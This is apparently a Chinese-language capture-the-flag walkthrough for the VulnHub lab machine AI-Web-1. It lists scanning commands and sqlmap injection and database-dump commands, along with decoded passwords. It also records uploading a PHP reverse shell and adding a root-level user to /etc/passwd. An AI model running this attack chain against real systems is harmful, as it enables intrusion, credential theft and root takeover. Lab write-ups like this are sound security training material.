下载链接：

https://www.vulnhub.com/entry/ai-web-1,353/

主机发现扫描：

主机端口扫描

http://10.10.202.158/

目录扫描：

╰─ sudo python3 dirsearch.py -u http://10.10.202.158 -e .php

[17:11:29] 200 - 141B - /index.html
[17:11:37] 200 - 82B - /robots.txt

分别进行目录探测：

╰─ sudo python3 dirsearch.py -u http://10.10.202.158/m3diNf0/ -e .php

[17:12:31] 200 -   84KB - /m3diNf0/info.php

╰─ sudo python3 dirsearch.py -u http://10.10.202.158/se3reTdir777/ -e .php

[17:14:54] 200 - 1KB - /se3reTdir777/index.php
[17:14:54] 200 - 1KB - /se3reTdir777/index.php/login/
[17:15:09] 301 - 250B - /se3reTdir777/uploads -> http://10.10.202.158/se3reTdir777/uploads/

SQL注入攻击

╰─ sqlmap -r ai.txt --dbs --batch 

╰─ sqlmap -r ai.txt --dbs --batch --dbs -D aiweb1 -T systemUser -C id,username,password --dump

base64 解密分别为：

t00r           RmFrZVVzZXJQYXNzdzByZA==   ----> FakeUserPassw0rd 
aiweb1pwn TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== --> MyEvilPass_f908sdaf9_sadfasf0sa
u3er          TjB0VGhpczBuZUFsczA=  ---> N0tThis0neAls0 

再次爆破未发现可登陆的后台地址，尝试下sqlmap 的os-shell

╰─ sqlmap -r ai.txt --dbs  --dbs --os-shell

应该是没有写入权限，我们尝试下upload目录

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

通过这个地址上传shell：

http://10.10.202.158:80/se3reTdir777/uploads/tmpuvuka.php 长传php-reverse.php

接下来进行提权操作

LinEnum.sh

╰─ openssl passwd -1 -salt hack403 pass123
$1$hack403$bsTXjmsCRF5fUFoYkS1io/

echo 'hack403:$1$hack403$bsTXjmsCRF5fUFoYkS1io/:0:0::/root:/bin/bash' >>/etc/passwd

完！